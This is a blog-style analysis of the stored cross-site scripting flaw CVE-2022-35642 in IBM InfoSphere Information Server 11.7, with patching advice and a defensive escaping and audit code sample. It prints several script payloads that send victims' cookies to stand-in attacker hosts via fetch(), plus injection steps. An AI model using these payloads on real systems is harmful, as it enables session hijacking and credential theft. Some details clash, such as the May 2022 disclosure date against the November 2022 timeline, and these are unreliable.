*Published: June 2024 — Exclusive long-form analysis by OpenAI writer*


IBM’s InfoSphere Information Server is a popular data integration platform, trusted by large enterprises to ingest, cleanse, and move their data. But in May 2022, a serious security issue was disclosed: CVE-2022-35642, which allows Cross-Site Scripting (XSS) attacks in version 11.7. If you administer InfoSphere, or use it as part of your company’s data workflow, you need to know exactly what this means — and how attackers could exploit this vector to steal credentials, hijack sessions, or otherwise compromise your data infrastructure.

This post breaks CVE-2022-35642 down, explains the XSS flaw, and walks you through a credible exploit scenario. Let’s get started.

Affected Product: IBM InfoSphere Information Server 11.7

- CVE Reference: CVE-2022-35642 at NVD
- IBM X-Force ID: 227592 (IBM Security Bulletin)

Risk: High — could lead to credentials disclosure and session hijacking

The flaw: Attackers can inject JavaScript payloads into the InfoSphere web interface, which are executed in the context of a logged-in user’s browser session. If you visit a malicious link, or if a malicious object is rendered in your workflow (such as a label or comment), arbitrary JavaScript may run — and potentially leak your session.

How Does the Vulnerability Work?

XSS flaws typically occur when web applications don’t “sanitize” (remove or neutralize) code that users submit in fields that are then displayed to others. In this case, InfoSphere’s web UI fails to strip out scriptable input in certain fields, such as object names, descriptions, or comments.

A Simple Exploit Example

Suppose a user with edit permissions on InfoSphere creates a new database connection, job, or annotation, and sets the name or description as:

<script>
  // Stray semicolon removed so the string concatenation is valid JavaScript
  fetch('https://attacker.example.com/steal?cookie=' + document.cookie);
</script>

If another authenticated user views a page where this crafted value is displayed, their browser will execute the JavaScript. In our example, it sends the victim’s InfoSphere cookies (which might include session IDs) to the attacker’s server.

Example Attack Flow

1. Attacker creates malicious input: In the “Description” field of a Job in InfoSphere, the attacker inserts:

<script>
  fetch('https://evil-hacker.com/xss?data=' + document.cookie);
</script>

2. Victim logs in and browses objects: An administrator or user with sufficient rights views the object listing page or details page containing the poisoned description.

3. Browser executes JavaScript: The injected script runs in the victim’s session, sending their Cookie (including session IDs, potentially login tokens) to the attacker’s server.

4. Attacker hijacks session: Attacker uses victim’s session ID to log in as that user, or leverages sensitive information to escalate privileges.

Here’s a sample JavaScript payload that could be used in this XSS:

<script>
  // Send the user's document cookie to the attacker's server
  // (stray semicolon removed so the string concatenation is valid JavaScript)
  fetch('https://malicious.example.com/collect?cookie=' + encodeURIComponent(document.cookie));
</script>

Inserting the Payload

This payload could be injected wherever the web UI lets users enter free text — such as in job names, comments, or configuration descriptions.

2. Create a new data job or object, and in any text field paste the above script.
3. Log in with a different InfoSphere account and navigate to a view where the field contents get rendered as HTML (not properly escaped).
4. Check the attacker server for incoming requests; if you see cookie/session data, the XSS worked.

Impact

- Credentials Disclosure: Stealing session cookies can allow an attacker to log in as a legitimate user without needing their password.
- Privilege Escalation: If the victim is an administrator, the attacker can escalate their privileges.
- Integrity and Data Loss: The attacker can run actions in the context of a trusted user, possibly altering, deleting, or stealing data.
- Phishing and Further Attacks: The attacker could trick users with prompt dialogs, redirect them, or deliver additional malware.

How to Protect Your InfoSphere Server

- Upgrade Immediately: IBM patched this issue in Fix Pack 3 and later releases for InfoSphere Information Server 11.7.
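As an added example, not code from this post or from IBM, the JavaScript below contrasts the rendering mistake described under “How Does the Vulnerability Work?” (user text concatenated straight into markup) with an output-encoded render, and adds a small audit helper for the cleanup step that belongs alongside the upgrade above: checking whether any stored description already carries an injected payload. The field name, record shape and sample records are constructed for the example; the payload string is the one shown earlier in the post.

```javascript
// Added example (not IBM's code): vulnerable vs. encoded rendering of a
// user-supplied "description" field, plus an audit of stored values.

// Constructed sample input: the cookie-exfiltration string from the post.
const PAYLOAD =
  "<script>fetch('https://attacker.example.com/steal?cookie=' + document.cookie);</script>";

// Encode the five characters that change meaning in HTML text/attribute context.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// The vulnerable pattern: user data concatenated directly into markup.
function renderDescriptionUnsafe(description) {
  return `<p class="job-description">${description}</p>`;
}

// The fix: every user-controlled value is encoded before it reaches markup,
// so the browser shows the text literally instead of executing it.
function renderDescriptionSafe(description) {
  return `<p class="job-description">${escapeHtml(description)}</p>`;
}

// Coarse review check: does rendered markup still contain a live script tag?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Constructed sample of stored metadata records, as an administrator might
// export them after patching; the record shape is an assumption here.
const SAMPLE_RECORDS = [
  { id: 'job-1', description: 'Nightly customer load' },
  { id: 'job-2', description: PAYLOAD },
  { id: 'job-3', description: 'Use <b>bold</b> for emphasis' },
  { id: 'job-4', description: '<img src=x onerror="alert(1)">' },
];

// Markup that has no business in a plain-text description field.
const ACTIVE_CONTENT = [
  /<script\b/i,
  /\bon[a-z]+\s*=/i,   // inline event handlers such as onerror=
  /javascript\s*:/i,   // javascript: URLs
  /<iframe\b/i,
];

// Return the ids of records whose description matches any active-content pattern.
function auditStoredValues(records) {
  return records
    .filter(r => ACTIVE_CONTENT.some(re => re.test(r.description)))
    .map(r => r.id);
}
```

The audit is deliberately coarse and meant to surface records for manual review, not to replace encoding: `job-3` passes because a bare `<b>` carries no script, while `job-4` is flagged by its inline event handler. Note also that the post's payload reads `document.cookie`; a session cookie issued with the `HttpOnly` flag is not visible to script, which removes the cookie-theft path shown here, although an injected script can still act within the victim's session, so output encoding remains the primary fix.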

References

- CVE-2022-35642 (MITRE/NVD)
- IBM Security Bulletin - InfoSphere Info Server Cross-Site Scripting
- X-Force ID: 227592
- OWASP Cross-Site Scripting (XSS) Cheat Sheet

Final Thoughts

CVE-2022-35642 is a textbook demonstration of why XSS vulnerabilities remain so dangerous in data-centric applications. In enterprise environments, a single successful session theft can pivot into major data loss or ransomware. Regular updates, smart user training, and strong input handling are your best defenses.

If you’re running IBM InfoSphere Information Server 11.7, make sure you’ve installed the latest fix pack. And always remember: never trust input data — and always escape output in your web UIs.


*Original exclusive content. For further questions and technical deep dives, leave a comment below!*

Timeline

Published on: 11/03/2022 20:15:00 UTC
Last modified on: 11/04/2022 14:06:00 UTC